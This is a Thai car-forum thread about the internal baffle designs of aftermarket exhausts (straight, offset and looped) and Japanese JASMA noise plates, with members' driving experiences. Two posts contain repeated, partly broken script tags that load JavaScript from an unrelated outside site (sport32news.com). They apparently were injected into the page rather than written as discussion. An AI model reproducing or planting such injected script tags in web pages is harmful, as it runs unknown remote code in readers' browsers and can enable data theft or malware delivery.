ตอบ
pongz19


ชื่อเล่น: โป้ง

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1168

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 859
ให้คำขอบคุณ: 489

ที่อยู่: ประชาอุทิศ
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 7 กันยา 2010 15:18 - งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ
กำลังดูๆท่ออยู่ครับ ปรากฎว่าอ่านไปอ่านมางงครับ ท่อที่เอามาขายมือ 2 ญี่ปุ่นมีไส้หลายแบบเลือกไม่ถูก
รู้แต่ว่าถ้ารถ auto หมดสิทธิ์ไส้ตรง เพราะมันโล่้งเกิน ตอนนี้กำลังอยากรู้ว่า ท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน ข้างในท่อมันเป็นยังงัย
เลยลองๆหารูปดู ได้มาตามนี้


------------------------------------------------------------------------
UPDATE!! หลังจากหาได้มาแต่รูป ตอนนี้ได้ข้อมูลมาเพิ่ม เลยเอารูปที่หามาใส่ลงไปในข้อความที่ได้มาเพิ่มด้วย เพื่อนๆจะได้เห็นภาพด้วยว่าอะไรเป็นอะไร
-------------------------------------------------------------------------


ไส้ตรง จะมีอยู่ทั้งในทรงกลม และทรงรี ถ้าเป็นทรงกลมจะเป็นไส้ตรงแน่นอน ส่วนทรงรี ดูท่อเข้าและด้านปลาย จะอยู่ในแนวเดียวกัน ยกเว้นบางยี่ห้อถึงแม้ท่อเข้ากับปลายทางออกไม่อยู่ในแนวเดียวกัน แต่เมื่อเอาไฟฉายส่องเข้าไปจะเห็นทางออกอีกทาง คือไส้ตรง เป็นการวางไส้แบบเอียง

งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ
งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ


ไส้ตรงแบบวางไส้เอียง มองภายนอกดูเหมือนเป็นไส้เยื้อง ปลายท่อกับท่อเข้าไม่อยู่ในแนวเดียวกัน เมื่อเอาไฟฉายส่องไปด้านในจะเห็นท่อทางออกอีกด้านหนึ่ง

ท่อไส้ตรงแบบวางไส้เอียง

งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ
งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ


ไส้เยื้อง จะมีอยู่ในท่อทรงรีเท่านั้น ถ้าเป็นทรงกลมของญี่ปุ่นจะมีแต่ไส้ตรง วีธีการดูสามารถดูได้จากภายนอกได้ โดยการดูที่ท่อทางเข้ากับปลายทางออก ถ้าทางเข้าไม่ตรงกับทางออก ใบนั้นก็คือไส้เยื้อง เช่น ท่อเข้าตรงกลางท่อ แต่ปลายอยู่มุมใดมุมหนึ่ง แต่ก็ไม่เสมอไปบางยี่ห้อท่อเข้าอยู่มุมแต่ปลายออกกลาง เมื่อส่องดูด้านในเราจะเห็นท่อทางเข้าอีกฝั่งนึง แบบนี้ส่วนตัวผมถือว่าเป็นไส้ตรง นั่นคือลักษณะการวางไส้เอียง (ดูรูปได้ที่ ท่อไส้ตรงแบบวางไส้เอียง) ท่อไส้เยื้องอีกแบบผมจะยกตัวอย่าง ของ A'PEXi ทรงรี ที่เป็นไส้เยื้อง ท่อเข้ากับปลายทางออกจะอยู่ตรงกลางเป็นแนวเดียวกัน มองภายนอกแล้วอาจคิดว่าเป็นไส้ตรง แต่เมื่อลองเอาไฟฉายส่องเข้าไปจะพบว่ากลางๆท่อจะมีผนังกั้นอยู่ 1 ชั้น เหมือนจะตันแต่จริงๆแล้วด้านข้าง จะมีท่อเชื่อมระหว่างห้องอยู่ เราไม่สามารถมองเห็นได้ ซึ่งดูได้จากรูป แบบนี้ผมถือว่าเป็นไส้เยื้อง

ไส้เยื้อง A'PEXi เป็นอีกยี่ห้อนึงที่ดูเหมือนไส้ตรงแต่จริงๆแล้วเป็นไส้เยื้อง เมื่อมองภายนอก ท่อเข้ากับปลายทางออกจะอยู่แนวเดียวกัน
แต่ไส้จะถูกเชื่อมต่อกันจากด้านข้าง ซึ่งถือว่าเป็นไส้เยื้อง ไม่ใช่ไส้ตรง
วิธีการที่แน่นอนคือเอาไฟฉายส่องเข้าไปด้านปลาย ถ้าเห็นถึงท่อทางเข้า นั่นคือไส้ตรง แต่ถ้าดูตันๆเหมือนมีอะไรมากั้น นั่นก็คือไส้เยื้อง

งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ
งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ

งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ
งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ

อีกวิธีที่ให้สังเกตว่าน่าจะเป็นไส้เยื้อง ก็คือ ดูจากสีของท่อ ถ้าเห็นเป็นสีทองๆไหม้ อยู่หัวหรือท้ายท่อ ดังรูป

งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ

รอยไหม้ที่เห็นน่าจะเกิดจากการอั้นขอไอเสียนั่นเอง วิธีที่แน่นอนที่สุดคือการเอาไฟฉายส่องเข้าไป ถ้าเห็นมีผนังกั้นอยู่ แสดงว่าเป็นไส้เยื้อง
ถ้าส่องเข้าไปแล้วเห็นท่อทางเข้าอีกฝั่งนึงนั่นคือไส้ตรง


ไส้วน ดูจากรูปจะเห็นว่าไอเสียจะไม่ได้วนตามท่อทั้งหมด จะมีบางส่วนเล็ดลอดออกไปได้ จะออกคล้ายๆท่อไส้เยื้อง

งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ


แถมเรื่อง JASMA (ย่อมาจาก Japan Automotive Sports Muffler Association) เป็นสัญลักษณ์บอกเกี่ยวกับมาตรฐานทางเสียงของท่อไอเสียใบนั้นๆของประเทศญี่ปุ่น ลักษณะจะเป็นเพลทติดมากับตัวท่อ ได้แก่ JASMA , SR JASMA , RO JASMA , R98 JASMA รายละเอียดดูได้ที่ http://www.sclabo.com/lecture/basic05_1_m.html บางรุ่นก็จะไม่มีติดมา แต่ก็ไม่ได้หมายความว่าใบไหนไม่มีติดมาแสดงว่าไม่ได้มาตรฐาน เนื่องจากบางรุ่นบางยี่ห้อ ได้บอกไว้ในเวปไซด์ของตัวเองแล้ว ว่ารุ่นนั้นๆผ่าน JASMA วิธีดูง่ายๆถ้าไม่มีีเพลทบอก ถ้าเป็นทรงรีไม่ว่าจะเป็นไส้เยื้องหรือไส้ตรงผ่าน JASMA แน่นอนถ้าเป็นทรงกลมๆให้ดูที่ไซเลนเซอร์ ถ้ามีไซเลนเซอร์ไม่ว่าจะเป็นแบบติดตายตัวหรือถอดได้อันนี้ก็ผ่านแน่นอน แต่ทรงกลมบางใบถึงจะมี JASMA แต่ก็ไม่เงียบนะครับ บางใบสนั่นกว่าไม่มีซะอีก ถ้าชอบทรงกลมแต่อยากได้เงียบๆก็หาที่มีไซเลนเซอร์แบบถอดได้จะดีกว่า ถ้าเป็นทรงรีเงียบสุดก็ต้องไส้เยื้องครับ

JASMA เริ่มใช้เมื่อ ค.ศ.1990 เพื่อแสดงว่า โรงงานผลิตท่อไอเสียที่สมัครใจเข้ารับการตรวจสภาพความดัง ได้ผ่าน "มาตรฐานของ JASMA" และจะมี เลขทะเบียน ปรากฎอยู่ รถทุกประเภท ทุกแบบเครื่องยนต์ ต้องผ่านการตรวจสภาพความดังตามมาตรฐานที่ JASMA กำหนด ซึ่งมาตรฐานความดังสูงสุดที่หน้าเครื่องจะอยู่ที่ 95db(A) และด้านท้ายเครื่องที่ 98db(A) ตาม พรบ.มลภาวะทางเสียง ปี Heisei 10 (ปีของญี่ปุ่น) ค่ามาตรฐานอาจแตกต่างกันที่ ค่ามาตรฐานเสียงสูงสุด (หากท่อไอเสียนั้นได้ผลิตก่อน พรบ.ฯ กำหนด จะสูงสุดที่ 100db(A)) ซึ่งการทดสอบนั้นจะถูกบันทึกลงในฐานของมูลของ JASMA สามารถตรวจสอบที่ใดก็ได้ทั่วประเทศ

งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ


SR JASMA (ย่อมาจาก Simi-Racing บางแหล่งข้อมูลบอกว่า Street Regulation) ผลิตภัณฑ์หลากชนิดหลั่งไหลเข้าสู่ท้องตลาดหลังจากที่ได้ระงับข้อกำหนด และผู้ผลิต หรืตัวแทนจำหน่าย ที่ผลิตภัณฑ์ไม่ได้ขึ้นทะเบียน จะติดเพลทชนิดนี้ตามที่สมาชิกของสมาคมได้ลงมติว่า ผลิตภัณฑ์ที่ไม่ได้อยู่ในกลุ่ม/สมาคม ได้ถูกนำออกมาโดยสมาคม เพลทนี้จะติดให้กับสินค้าที่ตัดสินว่าได้ผ่านมาตรฐานมลภาวะทางเสียง และสมาชิกกลุ่มผ่านมาตรฐานมลภาวะทางเสีย ตามที่รัฐบาลกำหนดในการรับผิดชอบของตนในฐานะผู้ผลิตที่แยกออกจากกลุ่ม/สมาคม

งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ


RO JASMA (ย่อมาจาก Race Use Only)

งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ


R98 JASMA เริ่มใช้เมื่อ ค.ศ.1998 ตามข้อกำหนดนั้น สามารถติดเพลทได้เมื่อผ่านมาตรฐาน JASMA ซึ่งมาตรฐานความดังสูงสุดที่หน้าเครื่องจากเดิมจะอยู่ที่ 96db(A) เปลี่ยนเป็น 95db(A) และด้านท้ายเครื่องจากเดิม 100db(A) เปลี่ยนเป็น 98db(A) ซึ่งเพลท R98 JASMA นั้นอยู่บนพื้นฐานมาตรฐานความปลอดภัยที่ได้แก้ไข พรบ.มลภาวะทางเสียง ในปี Heisei 10

งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ


ป.ล. ข้อความจากเจ้าของบทความ "บทความทั้งหมดผมแต่งขึ้นมาเองทั้งสิ้นไม่ได้คัดลอกมาจากแหล่งข้อมูลใดๆเป็นความเข้าใจส่วนตัวอาศัยจากการพบเห็นด้วยตัวเองทั้งสิ้นจะผิดถูกอย่างไรไม่รู้ เพราะผมเข้าใจของผมแบบนี้" K.อุ้ย, K.เป๊ก พ่อค้าจำหน่ายท่อไอเสียแต่งจากญี่ปุ่นย่านมหาชัย


ยังไม่เคลียร์เรื่องไส้ย้อนครับ ใครทราบข้อมูลช่วยบอกที


แก้ไขล่าสุดโดย เมื่อ พุธ, 15 กันยา 2010 11:50, ทั้งหมด 18 ครั้ง (ดูทั้งหมด)
note^-^


ชื่อเล่น: โน๊ต

เข้าร่วม: 23 ตุลา 2008
ตอบ: 1188

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1988
ให้คำขอบคุณ: 501

ที่อยู่: สมุทรสาคร-นครชัยศรี
ปี: 2003
อังคาร, 7 กันยา 2010 15:28 - งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ
ผิดถูกยังไงรอผู้รู้มาตอบอีกทีนะครับ
สำหรับผม MT ใส่ใส้ตรงอยู่ ผลเป็นที่น่าพอใจครับ

ผมว่าต่างกันที่ลักษณะการขับของแต่ละคนครับ ท่อแต่ละแบบ อัตราการใหลของไอเสียแตกต่างกัน
บางคนขับในตัวเมืองจะเน้นต้น
บางคนก็เน้นกลางๆ-ปลาย
ได้รับคำขอบคุณจาก: hacker 
etabb


ชื่อเล่น: อีตาบีบี

เข้าร่วม: 02 เมษา 2010
ตอบ: 797

Guru ES
Guru ES

ได้รับคำขอบคุณ: 2637
ให้คำขอบคุณ: 1611

ที่อยู่: ลาดพร้าว
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
อังคาร, 7 กันยา 2010 17:08 - งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ
รอ กูรู ครับ อยากรู้เหมือนกันครับ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
Oo-kakachi-oO


ชื่อเล่น: จ๊อตครับ

เข้าร่วม: 02 มิถุนา 2010
ตอบ: 597

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 1013
ให้คำขอบคุณ: 814

ที่อยู่: ริมคลองดำเนินสะดวก ^___^
ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 7 กันยา 2010 17:13 - งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ
รถเกียร์ออโต้อยากรู้ด้วยคนครับ
TONNN


ชื่อเล่น: นายต้น

เข้าร่วม: 28 กุมภา 2010
ตอบ: 39

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 33
ให้คำขอบคุณ: 47

ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 7 กันยา 2010 17:26 - งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ
ส่วนกระผมรู้จักแต่ไส้แห้ง T_T
ได้รับคำขอบคุณจาก: hacker  musashi44  nocomment  nayyai1 
nuengES02


ชื่อเล่น: หนึ่ง

เข้าร่วม: 11 ธันวา 2009
ตอบ: 824

Guru ES
Guru ES

ได้รับคำขอบคุณ: 668
ให้คำขอบคุณ: 373

ที่อยู่: เชียงใหม่คับ
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 7 กันยา 2010 19:16 - งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ
รอเก็บข้อมูลคับ
honeybeex7


เข้าร่วม: 11 มิถุนา 2010
ตอบ: 4710

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2450
ให้คำขอบคุณ: 10992

ที่อยู่: แดนสนธยาของ "เหล่าเทพ" มีแต่ "เทพ" ด้วยกันเท่านั้นที่ไปถึง
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 7 กันยา 2010 20:07 - งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ
ผมก็ auto ใส่ไส้ตรงบิดเกลียวอยู่อ่ะ ไม่รู้ว่าดีไหม หากว่าไม่เวิกร์จะได้ถอดขาย ใครรู้ช่วยตอบในกระทู้ หรือPM มาก็ได้ครับ
ได้รับคำขอบคุณจาก: hacker  redboynj 
Anakin


ชื่อเล่น: เอก

เข้าร่วม: 31 กรกฎา 2009
ตอบ: 1119

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 910
ให้คำขอบคุณ: 1439

ที่อยู่: Korat - Rayong
ปี: 2002
สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 7 กันยา 2010 20:37 - งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ
อยากรู้เช่นกัน
MrKhanoon


เข้าร่วม: 02 ตุลา 2008
ตอบ: 908

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1471
ให้คำขอบคุณ: 832

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 7 กันยา 2010 20:48 - งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ
ไส้ไหลครับ

มาเก็บข้อมูล
aoflimited


เข้าร่วม: 28 ตุลา 2008
ตอบ: 227

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 110
ให้คำขอบคุณ: 26

ที่อยู่: นนทบุรี
ปี: 2001
สี: ม่วง วินเทจพลัม (RP-32P)
อังคาร, 7 กันยา 2010 23:32 - งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ
at ใส้เยี้อง ย้อน วน ดีหมดคับ
ได้รับคำขอบคุณจาก: hacker 
Moo Uan


เข้าร่วม: 07 สิงหา 2009
ตอบ: 1127

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 426
ให้คำขอบคุณ: 126

ที่อยู่: ซ.นวมินทร์93 ถ.นวมินทร์ กทม.
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 8 กันยา 2010 01:00 - งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ
aoflimited พิมพ์ว่า:
at ใส้เยี้อง ย้อน วน ดีหมดคับ


ที่ว่าดีนะ ดียังไงครับ เช่น เงียบ ตีนต้น ตีนปลาย เร้วช้า ครับ อยากเอาเป็นข้อมูลเปลี่ยนท่อ ขอบคุณครับ
ได้รับคำขอบคุณจาก: hacker 
a.say


เข้าร่วม: 26 กันยา 2009
ตอบ: 711

Guru ES
Guru ES

ได้รับคำขอบคุณ: 725
ให้คำขอบคุณ: 1501

ที่อยู่: เมืองยะลา
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 8 กันยา 2010 05:09 - งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ
Moo Uan พิมพ์ว่า:
aoflimited พิมพ์ว่า:
at ใส้เยี้อง ย้อน วน ดีหมดคับ


ที่ว่าดีนะ ดียังไงครับ เช่น เงียบ ตีนต้น ตีนปลาย เร้วช้า ครับ อยากเอาเป็นข้อมูลเปลี่ยนท่อ ขอบคุณครับ



น่าคิดแหะ.. "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: hacker 
zan


เข้าร่วม: 23 สิงหา 2009
ตอบ: 3145

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3432
ให้คำขอบคุณ: 6687

ที่อยู่: HNC
พุธ, 8 กันยา 2010 08:18 - งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ
aaa


แก้ไขล่าสุดโดย เมื่อ เสาร์, 1 พฤศจิกา 2014 08:28, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: hacker  P.TER.357  SYS  tHe TW 
fasang.Mr


ชื่อเล่น: บี

เข้าร่วม: 23 มีนา 2010
ตอบ: 2101

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1764
ให้คำขอบคุณ: 2323

ที่อยู่: นนทบุรี-ประจวบฯ-พะเยา
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 8 กันยา 2010 08:44 - งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ
เก็บข้อมูลครับ
ได้รับคำขอบคุณจาก: hacker 
1st


ชื่อเล่น: โต

เข้าร่วม: 24 ธันวา 2008
ตอบ: 6754

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 173
ให้คำขอบคุณ: 15

ที่อยู่: รังสิต - คลอง 3
พุธ, 8 กันยา 2010 09:06 - งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ
[/b]


แก้ไขล่าสุดโดย เมื่อ พุธ, 8 กันยา 2010 21:23, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: honeybeex7  hacker 
jonatan


ชื่อเล่น: โจ

เข้าร่วม: 02 ตุลา 2008
ตอบ: 6291

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 19304
ให้คำขอบคุณ: 13458

ที่อยู่: ประชาอุทิศ - สุขสวัสดิ์ - สีลม
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 8 กันยา 2010 20:06 - งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ
รู้สั้นๆว่า เกียร์Auto ต้องอั้นๆ ถึงจะวิ่ง
เกียร์ธรรมดา ออกตรงๆบิดเกลียวไส้หน่อย พุ่งถึงไหนๆ
ได้รับคำขอบคุณจาก: hacker  P.TER.357  curran  tHe TW 
nokmodify


ชื่อเล่น: นกชลบุรี

เข้าร่วม: 08 กรกฎา 2010
ตอบ: 1415

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1292
ให้คำขอบคุณ: 282

ที่อยู่: เมืองชลบุรี
ปี: 2002
สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 8 กันยา 2010 20:44 - งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ
แจ่มไปเลยครับ ผ่ามาให้ชมกันเลย
ได้รับคำขอบคุณจาก: hacker 
gozzilla


เข้าร่วม: 18 ตุลา 2009
ตอบ: 256

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 179
ให้คำขอบคุณ: 222

ที่อยู่: พัทยานะ...
ปี: 2001
สี: น้ำเงิน อิเทอนอล (B-96P)
พุธ, 8 กันยา 2010 21:29 - งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ
ขอบคุณคับ
ได้รับคำขอบคุณจาก: hacker 
patoo


ชื่อเล่น: พงษ์

เข้าร่วม: 28 สิงหา 2010
ตอบ: 1273

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5438
ให้คำขอบคุณ: 3559

ที่อยู่: บางกอก-สุ1000
ปี: 2004
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 8 กันยา 2010 21:29 - งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ
ได้รับคำขอบคุณจาก: hacker 
chanyut_t


ชื่อเล่น: ยุทธ

เข้าร่วม: 17 สิงหา 2010
ตอบ: 9

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 11
ให้คำขอบคุณ: 1

ที่อยู่: เมือง ระยอง
ปี: 2005
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 8 กันยา 2010 22:11 - งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ
honeybeex7 พิมพ์ว่า:
ผมก็ auto ใส่ไส้ตรงบิดเกลียวอยู่อ่ะ ไม่รู้ว่าดีไหม หากว่าไม่เวิกร์จะได้ถอดขาย ใครรู้ช่วยตอบในกระทู้ หรือPM มาก็ได้ครับ


ของผม Auto 1.7 เคยใส่ไส้ตรงบิดเกลียว ออกตัวใช้รอบสูง ปลาย 180km...เหนื่อย (ในเมือง8-9 โล/ลิตร)
ตอนนี้ใช้ไส้เยื้อง ต้นมาเร็ว...ปลาย 200หน่อยๆ (ในเมือง12-13 โล/ลิตร) ส่วนตัวรู้สึกว่า Autoไส้ตรงจะโล่งไปครับ..
ได้รับคำขอบคุณจาก: honeybeex7  hacker  P.TER.357 
honeybeex7


เข้าร่วม: 11 มิถุนา 2010
ตอบ: 4710

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2450
ให้คำขอบคุณ: 10992

ที่อยู่: แดนสนธยาของ "เหล่าเทพ" มีแต่ "เทพ" ด้วยกันเท่านั้นที่ไปถึง
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พุธ, 8 กันยา 2010 22:27 - งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ
chanyut_t พิมพ์ว่า:
honeybeex7 พิมพ์ว่า:
ผมก็ auto ใส่ไส้ตรงบิดเกลียวอยู่อ่ะ ไม่รู้ว่าดีไหม หากว่าไม่เวิกร์จะได้ถอดขาย ใครรู้ช่วยตอบในกระทู้ หรือPM มาก็ได้ครับ


ของผม Auto 1.7 เคยใส่ไส้ตรงบิดเกลียว ออกตัวใช้รอบสูง ปลาย 180km...เหนื่อย (ในเมือง8-9 โล/ลิตร)
ตอนนี้ใช้ไส้เยื้อง ต้นมาเร็ว...ปลาย 200หน่อยๆ (ในเมือง12-13 โล/ลิตร) ส่วนตัวรู้สึกว่า Autoไส้ตรงจะโล่งไปครับ..






พอดี ผมก็ 1.7 auto เหมือนกัน เพิ่งเปลี่ยนจากท่อเดิม เป็น spoon N1 ที่เขาขายกันในหน้าซื้อขาย ผมซื้อมา 1800+เดินท่อสเเตนเลสถึงพักกลาง 1400 = ทั้งหมด3200 ใช้มา 1เดือนกว่าๆ เสียงนุ่ม ทุ้มดี แต่รู้สึกมันอืด หน่อยๆ อ่ะ จะเปลี่ยนเป้นตัวไหนดีครับ ราคาเท่าไหร่ จัดจากที่ไหน แนะนำแบบเยอะๆ หน่อยก็ดีครับ เห็นว่าท่านเคยใช้เหมือนกัน เอาตามสเตปที่ท่านใช้ก็ได้ครับ ผมจะได้ไปทำบ้าง ที่สำคัญต้องเสียงไม่ดังนะครับ

ป.ล.อันที่จริงผมชอบเสียงตัวปัจจุบันที่ใส่อยู่มากๆนะครับ แต่หากว่ามันไม่เวิกค์อ่ะ ผมจะได้เปลี่ยนเสียตั้งแต่ตอนนี้ จะได้เตรียมโพสขาย spoon N1 ซะเลย

ช่วยแนะนำทาง PM ด้วยครับ
ได้รับคำขอบคุณจาก: hacker  benzd  SYS  koobe 
chet


ชื่อเล่น: เชษฐ

เข้าร่วม: 26 มีนา 2009
ตอบ: 45

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 45
ให้คำขอบคุณ: 96

ที่อยู่: ดินแดง
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 9 กันยา 2010 10:19 - งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ
เก็บเป็นความรู้ได้อีกหนึ่งเรื่อง
ได้รับคำขอบคุณจาก: hacker 
jonatan


ชื่อเล่น: โจ

เข้าร่วม: 02 ตุลา 2008
ตอบ: 6291

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 19304
ให้คำขอบคุณ: 13458

ที่อยู่: ประชาอุทิศ - สุขสวัสดิ์ - สีลม
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 9 กันยา 2010 10:33 - งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ
honeybeex7 พิมพ์ว่า:
chanyut_t พิมพ์ว่า:
honeybeex7 พิมพ์ว่า:
ผมก็ auto ใส่ไส้ตรงบิดเกลียวอยู่อ่ะ ไม่รู้ว่าดีไหม หากว่าไม่เวิกร์จะได้ถอดขาย ใครรู้ช่วยตอบในกระทู้ หรือPM มาก็ได้ครับ


ของผม Auto 1.7 เคยใส่ไส้ตรงบิดเกลียว ออกตัวใช้รอบสูง ปลาย 180km...เหนื่อย (ในเมือง8-9 โล/ลิตร)
ตอนนี้ใช้ไส้เยื้อง ต้นมาเร็ว...ปลาย 200หน่อยๆ (ในเมือง12-13 โล/ลิตร) ส่วนตัวรู้สึกว่า Autoไส้ตรงจะโล่งไปครับ..






